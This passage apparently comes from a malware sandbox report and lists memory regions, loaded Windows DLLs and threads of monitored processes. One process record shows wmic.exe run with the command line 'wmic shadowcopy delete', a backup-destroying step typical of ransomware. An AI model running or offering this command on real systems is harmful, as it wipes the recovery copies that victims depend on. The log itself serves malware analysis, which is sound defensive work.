	        filename = ""

Region:
	              id = 1574
	        start_va = 0x25f97150000
	          end_va = 0x25f9736efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f97150000"
	        filename = ""

Region:
	              id = 1575
	        start_va = 0x25f96a10000
	          end_va = 0x25f96b25fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f96a10000"
	        filename = ""

Region:
	              id = 1576
	        start_va = 0x25f96be0000
	          end_va = 0x25f96beffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f96be0000"
	        filename = ""

Region:
	              id = 1601
	        start_va = 0x25f97370000
	          end_va = 0x25f97580fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f97370000"
	        filename = ""

Region:
	              id = 1602
	        start_va = 0x25f97590000
	          end_va = 0x25f9769cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f97590000"
	        filename = ""

Region:
	              id = 1642
	        start_va = 0x7ab4f70000
	          end_va = 0x7ab4faffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000007ab4f70000"
	        filename = ""

Region:
	              id = 1643
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1644
	        start_va = 0x25f950a0000
	          end_va = 0x25f950a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f950a0000"
	        filename = ""

Region:
	              id = 1645
	        start_va = 0x25f976a0000
	          end_va = 0x25f9775bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f976a0000"
	        filename = ""

Region:
	              id = 1646
	        start_va = 0x25f950a0000
	          end_va = 0x25f950a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f950a0000"
	        filename = ""

Region:
	              id = 1647
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1670
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1671
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1672
	        start_va = 0x25f950b0000
	          end_va = 0x25f950b6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025f950b0000"
	        filename = ""

Region:
	              id = 1673
	        start_va = 0x25f950c0000
	          end_va = 0x25f950c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f950c0000"
	        filename = ""

Region:
	              id = 1674
	        start_va = 0x25f950d0000
	          end_va = 0x25f950d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f950d0000"
	        filename = ""

Region:
	              id = 1675
	        start_va = 0x25f950e0000
	          end_va = 0x25f950e4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1676
	        start_va = 0x25f950f0000
	          end_va = 0x25f950f0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1691
	        start_va = 0x25f95100000
	          end_va = 0x25f95101fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f95100000"
	        filename = ""

Region:
	              id = 1692
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1693
	        start_va = 0x25f95110000
	          end_va = 0x25f95110fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1694
	        start_va = 0x25f95130000
	          end_va = 0x25f95131fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025f95130000"
	        filename = ""


Thread:
	id = 67
	os_tid = 0xfb4


Thread:
	id = 70
	os_tid = 0xfd8


Thread:
	id = 72
	os_tid = 0xd48


Thread:
	id = 79
	os_tid = 0x13c8


Process:
	id = "21"
	image_name = "wmic.exe"
	filename = "c:\\windows\\syswow64\\wbem\\wmic.exe"
	page_root = "0x316fb000"
	os_pid = "0xfd0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0x12ec"
	cmd_line = "wmic  shadowcopy delete"
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1383
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1384
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1385
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1386
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1387
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1388
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1389
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1390
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1391
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1392
	        start_va = 0x1010000
	          end_va = 0x1073fff
	       monitored = 1
	     entry_point = 0x104a520
	     region_type = mapped_file
	            name = "wmic.exe"
	        filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe")

Region:
	              id = 1393
	        start_va = 0x1080000
	          end_va = 0x507ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000001080000"
	        filename = ""

Region:
	              id = 1394
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1395
	        start_va = 0x7fb90000
	          end_va = 0x7fbb2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fb90000"
	        filename = ""

Region:
	              id = 1396
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1397
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1398
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1399
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1400
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1416
	        start_va = 0x400000
	          end_va = 0x56ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1417
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1424
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1425
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1445
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1446
	        start_va = 0x400000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1447
	        start_va = 0x560000
	          end_va = 0x56ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000560000"
	        filename = ""

Region:
	              id = 1455
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1456
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1457
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1458
	        start_va = 0x7fa90000
	          end_va = 0x7fb8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fa90000"
	        filename = ""

Region:
	              id = 1508
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1509
	        start_va = 0x1c0000
	          end_va = 0x1c3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1510
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1511
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1512
	        start_va = 0x460000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000460000"
	        filename = ""

Region:
	              id = 1513
	        start_va = 0x570000
	          end_va = 0x5affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000570000"
	        filename = ""

Region:
	              id = 1514
	        start_va = 0x710c0000
	          end_va = 0x710eefff
	       monitored = 0
	     entry_point = 0x710cbb70
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 1532
	        start_va = 0x6f850000
	          end_va = 0x6f88efff
	       monitored = 0
	     entry_point = 0x6f8646c0
	     region_type = mapped_file
	            name = "framedynos.dll"
	        filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll")

Region:
	              id = 1533
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1534
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1565
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1566
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1567
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1568
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1569
	        start_va = 0x5b0000
	          end_va = 0x77ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 1573
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2246
	        start_va = 0x1d0000
	          end_va = 0x1d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001d0000"
	        filename = ""

Region:
	              id = 2247
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2254
	        start_va = 0x1e0000
	          end_va = 0x1e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001e0000"
	        filename = ""

Region:
	              id = 2255
	        start_va = 0x6f840000
	          end_va = 0x6f84cfff
	       monitored = 0
	     entry_point = 0x6f843520
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll")

Region:
	              id = 2256
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 2257
	        start_va = 0x6f7d0000
	          end_va = 0x6f836fff
	       monitored = 0
	     entry_point = 0x6f7eb610
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll")

Region:
	              id = 2267
	        start_va = 0x71110000
	          end_va = 0x7112afff
	       monitored = 0
	     entry_point = 0x71119050
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 2304
	        start_va = 0x780000
	          end_va = 0xab6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2310
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 2311
	        start_va = 0x5b0000
	          end_va = 0x699fff
	       monitored = 0
	     entry_point = 0x5ed650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 2312
	        start_va = 0x770000
	          end_va = 0x77ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000770000"
	        filename = ""

Region:
	              id = 2313
	        start_va = 0x1f0000
	          end_va = 0x1f3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001f0000"
	        filename = ""

Region:
	              id = 2323
	        start_va = 0x6f640000
	          end_va = 0x6f7cdfff
	       monitored = 0
	     entry_point = 0x6f6638c0
	     region_type = mapped_file
	            name = "msxml3.dll"
	        filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")

Region:
	              id = 2325
	        start_va = 0xac0000
	          end_va = 0xc8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ac0000"
	        filename = ""

Region:
	              id = 2326
	        start_va = 0x5b0000
	          end_va = 0x76ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 2327
	        start_va = 0x5b0000
	          end_va = 0x60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 2328
	        start_va = 0x760000
	          end_va = 0x76ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000760000"
	        filename = ""

Region:
	              id = 2329
	        start_va = 0x610000
	          end_va = 0x6cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 2330
	        start_va = 0xc90000
	          end_va = 0xe5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000c90000"
	        filename = ""

Region:
	              id = 2331
	        start_va = 0xac0000
	          end_va = 0xc5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ac0000"
	        filename = ""

Region:
	              id = 2332
	        start_va = 0xc80000
	          end_va = 0xc8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000c80000"
	        filename = ""

Region:
	              id = 2333
	        start_va = 0x610000
	          end_va = 0x66ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 2334
	        start_va = 0x6c0000
	          end_va = 0x6cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006c0000"
	        filename = ""

Region:
	              id = 2335
	        start_va = 0xac0000
	          end_va = 0xb9ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 2336
	        start_va = 0xc50000
	          end_va = 0xc5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000c50000"
	        filename = ""

Region:
	              id = 2337
	        start_va = 0x5080000
	          end_va = 0x547ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005080000"
	        filename = ""

Region:
	              id = 2338
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "msxml3r.dll"
	        filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll")

Region:
	              id = 2339
	        start_va = 0x5b0000
	          end_va = 0x5cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 2340
	        start_va = 0x600000
	          end_va = 0x60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 2341
	        start_va = 0x71350000
	          end_va = 0x714cdfff
	       monitored = 0
	     entry_point = 0x713cc630
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 2342
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 2343
	        start_va = 0x76790000
	          end_va = 0x7681cfff
	       monitored = 0
	     entry_point = 0x767d9b90
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 2344
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 2345
	        start_va = 0x73950000
	          end_va = 0x73c1afff
	       monitored = 0
	     entry_point = 0x73b8c4c0
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 2346
	        start_va = 0x74090000
	          end_va = 0x74588fff
	       monitored = 0
	     entry_point = 0x74297610
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 2347
	        start_va = 0x75d80000
	          end_va = 0x75db6fff
	       monitored = 0
	     entry_point = 0x75d83b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 2348
	        start_va = 0x76ff0000
	          end_va = 0x77033fff
	       monitored = 0
	     entry_point = 0x76ff7410
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 2349
	        start_va = 0x768e0000
	          end_va = 0x768eefff
	       monitored = 0
	     entry_point = 0x768e2e40
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 2350
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 2351
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 2352
	        start_va = 0x5d0000
	          end_va = 0x5f9fff
	       monitored = 0
	     entry_point = 0x5d5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2353
	        start_va = 0xc90000
	          end_va = 0xe17fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000c90000"
	        filename = ""

Region:
	              id = 2354
	        start_va = 0xe50000
	          end_va = 0xe5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e50000"
	        filename = ""

Region:
	              id = 2355
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2356
	        start_va = 0x450000
	          end_va = 0x45ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "wmic.exe.mui"
	        filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui")

Region:
	              id = 2357
	        start_va = 0xe60000
	          end_va = 0xfe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000e60000"
	        filename = ""

Region:
	              id = 2358
	        start_va = 0x5480000
	          end_va = 0x687ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000005480000"
	        filename = ""

Region:
	              id = 2359
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 2360
	        start_va = 0x5d0000
	          end_va = 0x5d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
